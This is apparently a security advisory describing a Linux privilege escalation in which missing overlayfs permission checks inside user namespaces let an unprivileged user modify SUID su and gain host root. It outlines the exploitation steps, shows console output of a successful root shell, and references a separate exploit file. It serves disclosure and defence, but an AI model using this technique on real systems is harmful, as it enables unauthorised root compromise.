Problem description:

Linux user namespace allows to mount file systems as normal user, including the overlayfs. As many of those features were not designed with namespaces in mind, this increase the attack surface of the Linux kernel interface. Due to missing security checks when changing mode of files on overlayfs, a SUID binary can be created within user namespace but executed from outside to gain root privileges.

Overlayfs was intended to allow create writeable filesystems when running on readonly medias, e.g. on a live-CD. In such scenario, the lower filesystem contains the read-only data from the medium, the upper filesystem part is mixed with the lower part. This mixture is then presented as an overlayfs at a given mount point. When writing to this overlayfs, the write will only modify the data in upper, which may reside on a tmpfs for that purpose.

One problematic use case is the modification of file or attributes of files on the overlayfs within a user namespace. A user without any capabilities on the host is given CAP_SYSADMIN within the user namespace, thus having capabilities to change the attributes of files on the overlayfs when not checking, if the host-system user would also have the capability to change the attributes of the file without having CAP_SYSADMIN there also. As this check was missing, the process within namespace could gain read/write access to arbitrary files. Combined with the SUID-write technique from a previous article (SetgidDirectoryPrivilegeEscalation), modification of host-UID-0 SUID-binaries allows escalation to host root user.


Exploitation Technique:

Exploitation is technically quite simple:


This exploit uses one parent and one user namespace process. The namespace process creates the overlayfs mount, chdirs to the directory and makes su writable. Afterwards this process waits until the parent has gained root privileges before rolling everything back: unmounting, cleanup of helper files. As soon as the parent process notices, that the child has prepared su as intended, it uses the technique from SetgidDirectoryPrivilegeEscalation, that is calling another SUID binary, e.g. mount, to use stderr to write to the opened su file without loosing SUID bit. Afterwards parent process invokes the modified su to create an UID 0 process. The change of the parent's UID then triggers the namespace child to start cleanup. See UserNamespaceOverlayfsSetuidWriteExec.c for example code.

build# ./UserNamespaceOverlayfsSetuidWriteExec -- /bin/bash Setting uid map in /proc/491/uid_map Setting gid map in /proc/491/gid_map euid: 0, egid: 0 euid: 0, egid: 0 Namespace helper waiting for modification completion Namespace part completed root#

Results, Discussion

The missing security checks in overlayfs were just a mistake, that should not happen, but which by itself would not have those devastating effects. By exposing quite some kernel functionality to unprivileged users via user namespaces, this increases the attack surface of the kernel significantly. Thus it might be a good idea to deactivate it on standard kernels by default and grant it only to selected users.

For the above exploit to work, not only exposure within the namespace is required, a process from outside uses /proc to access the mounts which should be visible only to processes within the namespace. This is by itself already a risk but might be also a security vulnerability by itself, worth fixing. Mixing content from within namespaces and processes outside the namespace was also used to for FIXME.


Material, References

Last modified 20171228
Contact e-mail: me (%)